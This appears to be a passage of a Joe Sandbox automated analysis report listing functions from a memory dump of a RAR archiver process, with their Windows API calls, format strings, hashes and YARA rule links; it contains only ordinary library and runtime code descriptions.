Part of subcall function 00007FF7CF8CBC8C: FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7CF8CBCEF
Part of subcall function 00007FF7CF8CBC8C: FileTimeToSystemTime.KERNEL32 ref: 00007FF7CF8CBD68

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8CBEAE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8CBED8

Strings

????-??-?? ??:??, xrefs: 00007FF7CF8CBEDF
%u-%02u-%02u %02u:%02u:%02u,%09u, xrefs: 00007FF7CF8CBE80
%u-%02u-%02u %02u:%02u, xrefs: 00007FF7CF8CBEB8

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Time$File$swprintf$LocalSystem
String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
API String ID: 1364621626-1794493780
Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction ID: a1ad929723df542c2182402fbc88569889e7e5e70ca3bdb068257e5a1201c2f7
Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction Fuzzy Hash: 9E21F576A187818EE760DF64E480A9DB7F0F748BA4F545032EE4893B48DB39E8519F20

Function 00007FF7CF8E24D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7CF8E24F4
GetProcAddress.KERNEL32 ref: 00007FF7CF8E250A
FreeLibrary.KERNEL32 ref: 00007FF7CF8E252F

Strings

mscoree.dll, xrefs: 00007FF7CF8E24EB
CorExitProcess, xrefs: 00007FF7CF8E2503

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
Instruction ID: fe493b243ea1782caa37193be52d8185c756c65621a9b093af523af7b1e8cec2
Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
Instruction Fuzzy Hash: 6DF04435A196C286EF85AF11F8503B9A3A0AF987A0F881035E94F46664DF3CD4A4D730

Function 00007FF7CF8EC654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction ID: 597401f1f91252f6154a07c2abc6d2c569803609fa3da22badc276fd7b645fd5
Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction Fuzzy Hash: A3A10466F087C246EB61AF6484043F9A6D1AF42BB4F984635DA6D067D5DF3CE424E330

Function 00007FF7CF8E7AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E7AF9

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
Instruction ID: 3e522ab874da945b54dd8f97e6c45cf34a3db4b7959fdd2f59177af01fb4ec6f
Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
Instruction Fuzzy Hash: 6C81AF2AB186D285FB10AF6598807FDA6E4BB45B64F804135DD2E52795CF3CE461E330

Function 00007FF7CF8E7428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7CF8E7C5B), ref: 00007FF7CF8E7485
WideCharToMultiByte.KERNEL32 ref: 00007FF7CF8E7561
WriteFile.KERNEL32 ref: 00007FF7CF8E7587
WriteFile.KERNEL32 ref: 00007FF7CF8E75C6
GetLastError.KERNEL32 ref: 00007FF7CF8E75FE

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
Instruction ID: f11eaa016125ef59607148edaa7fdcbc81ef6c2316db2a1fb825cb698f9338ba
Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
Instruction Fuzzy Hash: A351D036A18A918AEB11DF25D8443ECBBB0BB44BA8F448135CE1A47A98DF3CD151D730

Function 00007FF7CF8980C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7CF89814D
CharToOemA.USER32 ref: 00007FF7CF8981D8
WriteFile.KERNEL32 ref: 00007FF7CF8981FB
GetStdHandle.KERNEL32 ref: 00007FF7CF898242
WriteConsoleW.KERNEL32 ref: 00007FF7CF898266

Part of subcall function 00007FF7CF8CD840: WideCharToMultiByte.KERNEL32 ref: 00007FF7CF8CD871

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CharHandleWrite$ByteConsoleFileMultiWide
String ID:
API String ID: 643171463-0
Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction ID: d807ced4bea84c22e6301195a283e341f0616784149c1a95ab80b9199f874b3e
Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction Fuzzy Hash: 2641A621E08AC246EA24BF21A8102F9A2D0AF45BB0FC40335E96D177D5DF3CE565E770

Function 00007FF7CF8E69B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7CF8E6AD6

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction ID: 7e25994b451d5f957aac10106c17264d83bfc85afd243db837fa420170a2668e
Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction Fuzzy Hash: AC41E525F2968295FE15AF01A8006F5E6E1BF48BF0F998535DD1D4B388EE3CE8109370

Function 00007FF7CF8EDC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7CF8EDC47
_set_statfp.LIBCMT ref: 00007FF7CF8EDC62
_set_statfp.LIBCMT ref: 00007FF7CF8EDC7E
_set_statfp.LIBCMT ref: 00007FF7CF8EDCBA

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction ID: 26405add48aad2584397546d9d190ae3f0eddb24902f1f49ab5d570e5adcca55
Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction Fuzzy Hash: 2011B22FE9868206F7643924E4863F991C16F553F0E854234E97E067D6CEACE46A6230

Function 00007FF7CF897514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8CCD7C: MessageBeep.USER32(?,?,?,?,00007FF7CF89CA56,?,?,?,00007FF7CF8CB9B7), ref: 00007FF7CF8CCD9E

wcschr.LIBVCRUNTIME ref: 00007FF7CF897597
wcschr.LIBVCRUNTIME ref: 00007FF7CF89768D

Strings

(, xrefs: 00007FF7CF897754
[%c]%ls, xrefs: 00007FF7CF897743

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: wcschr$BeepMessage
String ID: ($[%c]%ls
API String ID: 1408639281-228076469
Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
Instruction ID: a8e8d2e692b31376d37ca96fdeefc566ed47342e05d8602030cc94a4568e11cc
Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
Instruction Fuzzy Hash: 7E81C422A0868286EF64EF05E4402FEA7E1FB84B98F940035EE5E57755DF3CE661D720

Function 00007FF7CF8A6FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A7176
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A7221

Strings

%c%c%c%c%c%c%c%c%c, xrefs: 00007FF7CF8A716F
%c%c%c%c%c%c%c, xrefs: 00007FF7CF8A71E3

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: swprintf
String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
API String ID: 233258989-622958660
Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction ID: 7001ef9e64a5422407dd394a17cbfe4db6ec4548c314ddc69f0286790f365061
Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction Fuzzy Hash: 545139F3F386848AE7648F1CE881BE96790F364BE1F945A24F94A93B44D63DDA548700

Function 00007FF7CF896E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

wcschr.LIBVCRUNTIME ref: 00007FF7CF896EC8
wcschr.LIBVCRUNTIME ref: 00007FF7CF896F16

Strings

MCAOmcao, xrefs: 00007FF7CF896F0F
MCAOmcao, xrefs: 00007FF7CF896EC1

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: wcschr
String ID: MCAOmcao$MCAOmcao
API String ID: 1497570035-1725859250
Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction ID: d77b62805d8e5a4d17a1e20cb44be5768b93043fa9907c248e2fe6e445d68ac9
Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction Fuzzy Hash: 03418012E0C6C780EA21BF2151515FDD2E1AF51BA4FD84032EA5D462D9EE2DF670B231

Function 00007FF7CF8A3528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7CF8A359E
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A35E6

Part of subcall function 00007FF7CF8A30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF7CF8A305D,?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800), ref: 00007FF7CF8A30F0
Part of subcall function 00007FF7CF8A30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7CF8A3119

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A3651

Strings

%u.%03u, xrefs: 00007FF7CF8A35A7, 00007FF7CF8A3630

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AttributesFileswprintf$CurrentProcess
String ID: %u.%03u
API String ID: 2814246642-1114938957
Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
Instruction ID: 84f590869d2d8d76bf2e8293c336c20fe2094c9fd1b4f1814bc468caddc42aca
Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
Instruction Fuzzy Hash: C73149616186C142EB14BF24E4113FAE2A0FB947B4FA01331EA7E477E1DE3DD5269320

Function 00007FF7CF8E7854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7CF8E793A
WriteFile.KERNEL32 ref: 00007FF7CF8E796D
GetLastError.KERNEL32 ref: 00007FF7CF8E798F

Strings

U, xrefs: 00007FF7CF8E7918

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
Instruction ID: 082deb28b52216f45a6b090b7b631acf15373f8b52943b23664b98c877fe0900
Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
Instruction Fuzzy Hash: D941B632B19A8686EB20AF15E8443F9B7A1FB98BA4F814031EE4D87794DF3CD411D764

